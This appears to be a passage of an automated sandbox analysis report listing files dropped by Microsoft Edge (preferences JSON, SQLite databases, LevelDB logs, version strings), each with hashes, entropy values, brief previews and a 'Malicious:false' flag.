                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379752881481832","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379752881481832","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b6ed0e4b-9d05-43fb-a6a7-c3d9b6682c77.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5672700036123866
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:hF/oSwWPEmfMH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVh80bErwOp8tuV:hF/oSwWPEmfMHu1jagXbd1tK
                                                                                                                                                                                                                                                                                                  MD5:5F9FCCEB924EAC3B25C6C070503B055C
                                                                                                                                                                                                                                                                                                  SHA1:7B0BF34CC947C37CA3A39AE5194611767BF0CB28
                                                                                                                                                                                                                                                                                                  SHA-256:06904C39FC9B4CC66670139BF36BA4C647D9D995A0C82DE2754D437A32499023
                                                                                                                                                                                                                                                                                                  SHA-512:339C9819F2F7CA3012B022C2857EBAD0709F6E81A5AE6EFCCA4FF06126904C09339A6EDE76B7EC3043D3D95D0F986CE48D35E5D4F1C9BA8E2C9915D293CB0DCF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379752881481832","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379752881481832","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bd3ca56d-9a97-4324-8729-47f1722b7ced.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17789), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):17791
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.487790762964317
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:stp+PGQSu4zszkfhxYdEPicibGjQwR6WvlaTYm:sGOXu/kfcdVbGcahaTYm
                                                                                                                                                                                                                                                                                                  MD5:B978879A219A8D4A0F4AEF426CA89089
                                                                                                                                                                                                                                                                                                  SHA1:D9B485DAE92A67B54D89E248F625C53FBC82CF2F
                                                                                                                                                                                                                                                                                                  SHA-256:CDDEF55D7F7FDD427E9D8325814FFCBBF1A1F438259621846AACDAA45F726724
                                                                                                                                                                                                                                                                                                  SHA-512:0D95F125BE44B8A1AD5C1F22C7D3BCED7760913906AF4AC5BE17D304B803C5EC3EE3A53B51416CC18A4C17DAA7C5E2A6C5081298C1E409461F2176439D33B34F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379752882058560","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.10257140747202309
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Gu0Hrn20Hr489XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/VS:+HTHUspEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                                                                                                                                                  MD5:3FF09DD6E7541F8EE2AD5577F2B6A262
                                                                                                                                                                                                                                                                                                  SHA1:80F82D809B8452CD45BC86BDA3CC24C99C988867
                                                                                                                                                                                                                                                                                                  SHA-256:58E6B78CBF558A311EE5BDC36BA2C91F0BFEF5714E3959464F91CC270913FF02
                                                                                                                                                                                                                                                                                                  SHA-512:05B3E5A76C7CD8B1A1CE23FFFBD5EC6D706358F495A3745583510F345C3DFAC4B73A41FDCAF49BFB9BEAD5E6E87674001187E51D7A3055484EE431720FDDC7CF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:..-.............M........E.58...4..}.....9.3<N..-.............M........E.58...4..}.....9.3<N........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):317272
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8870563588727385
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:G2DHdxpxi99tJLaJzmiaQg1CaZywLYaS5n9adDNOaH7Wb1aaxjv8psyRyH+yTyR/:AZbHHxQ80c+Xi
                                                                                                                                                                                                                                                                                                  MD5:EF109FE95B5F79E7BF9EF0174B8A53DE
                                                                                                                                                                                                                                                                                                  SHA1:27353E393E9F260FA282AD5BD7F18EDFAC17BC89
                                                                                                                                                                                                                                                                                                  SHA-256:62FD09AC733405F3019BFD018A2B1960715D6FF24CBE8D3F56C6D996DA7A7B90
                                                                                                                                                                                                                                                                                                  SHA-512:ABABE841F108FFFE954943AFC1B7C6E54900A88D2650EFE5CEA86DA20870E12C01219D644F933B0208818FA1F735A69163B45B4893116C82EB3F70267C5099BC
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):694
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.556837182207769
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuuuUllnNNq8N:iDql3V
                                                                                                                                                                                                                                                                                                  MD5:2A77C3054EA00C41709E7D4740628EA1
                                                                                                                                                                                                                                                                                                  SHA1:E982CC09C7B279CA621E9345F71FFD94761EE1D5
                                                                                                                                                                                                                                                                                                  SHA-256:E80830434237466DE6AA4F9E667EBA99C4789DE6FA497688BF85266483FE07D2
                                                                                                                                                                                                                                                                                                  SHA-512:A32B9CAF469222FEEEA94C8C8B17FF7057B1A05222B3A7407A2388F7CC1C2ED7B23545BA25E96BB7D92766243A43F1ADDEBC6388DB5E5D72A6E552E72E983582
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............D..;...............#38_h.......6.Z..W.F.....~......~...........V.e................V.e..................!.0................39_config..........6.....n ...1

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.124187466164022
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XHFMIq2P923oH+TcwtfrK+IFUt8U4XPZmw+U4XFFIkwO923oH+TcwtfrUeLJ:BrIv4Yeb23FUt8Uk/+UiFI5LYeb3J
                                                                                                                                                                                                                                                                                                  MD5:89E1EDEE125D9B3604828A886764EA49
                                                                                                                                                                                                                                                                                                  SHA1:93865EFE23340B1786C357EE846DDA96F559F378
                                                                                                                                                                                                                                                                                                  SHA-256:1E3205B4CB70267940AC53FF284ED03AB8EE07CA46224ACCB33D564A0653AD09
                                                                                                                                                                                                                                                                                                  SHA-512:9F82D41349140D06B66635CE70169E6E4D07F3E9F8B896B697E1EBAF107A4DDAF31BA32A87F39BBF404BCEC10737738A8BFB8ABBE96A53E23065BE2598722AFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.114 e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-01:01:22.115 e04 Recovering log #3.2024/12/27-01:01:22.116 e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.124187466164022
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XHFMIq2P923oH+TcwtfrK+IFUt8U4XPZmw+U4XFFIkwO923oH+TcwtfrUeLJ:BrIv4Yeb23FUt8Uk/+UiFI5LYeb3J
                                                                                                                                                                                                                                                                                                  MD5:89E1EDEE125D9B3604828A886764EA49
                                                                                                                                                                                                                                                                                                  SHA1:93865EFE23340B1786C357EE846DDA96F559F378
                                                                                                                                                                                                                                                                                                  SHA-256:1E3205B4CB70267940AC53FF284ED03AB8EE07CA46224ACCB33D564A0653AD09
                                                                                                                                                                                                                                                                                                  SHA-512:9F82D41349140D06B66635CE70169E6E4D07F3E9F8B896B697E1EBAF107A4DDAF31BA32A87F39BBF404BCEC10737738A8BFB8ABBE96A53E23065BE2598722AFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.114 e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-01:01:22.115 e04 Recovering log #3.2024/12/27-01:01:22.116 e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):787
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                                  MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                                  SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                                  SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                                  SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.077232045769241
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4Xyq2P923oH+TcwtfrzAdIFUt8U4X7Zmw+U4XBFkFkwO923oH+TcwtfrzILJ:Bdv4Yeb9FUt8U4/+UmFkF5LYeb2J
                                                                                                                                                                                                                                                                                                  MD5:1769E5E8FF88AB0556BB2727703423B3
                                                                                                                                                                                                                                                                                                  SHA1:751938D8509B64488D3E38D1A14EF9544557ED7B
                                                                                                                                                                                                                                                                                                  SHA-256:B091395A56D6C44BC57DC89409E37B8EE354C4FDBB5B00D73513A85CDE3876D2
                                                                                                                                                                                                                                                                                                  SHA-512:358FDD785C194A276616C7519A5FCC98E3EBDC231609613708DB60B0658AE19F92FAEBB5A50E6CFA70B82C554FA814FC91BFFD5DE427AFE9C4762720D49848F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.111 e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-01:01:22.111 e04 Recovering log #3.2024/12/27-01:01:22.112 e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.077232045769241
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4Xyq2P923oH+TcwtfrzAdIFUt8U4X7Zmw+U4XBFkFkwO923oH+TcwtfrzILJ:Bdv4Yeb9FUt8U4/+UmFkF5LYeb2J
                                                                                                                                                                                                                                                                                                  MD5:1769E5E8FF88AB0556BB2727703423B3
                                                                                                                                                                                                                                                                                                  SHA1:751938D8509B64488D3E38D1A14EF9544557ED7B
                                                                                                                                                                                                                                                                                                  SHA-256:B091395A56D6C44BC57DC89409E37B8EE354C4FDBB5B00D73513A85CDE3876D2
                                                                                                                                                                                                                                                                                                  SHA-512:358FDD785C194A276616C7519A5FCC98E3EBDC231609613708DB60B0658AE19F92FAEBB5A50E6CFA70B82C554FA814FC91BFFD5DE427AFE9C4762720D49848F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.111 e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-01:01:22.111 e04 Recovering log #3.2024/12/27-01:01:22.112 e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
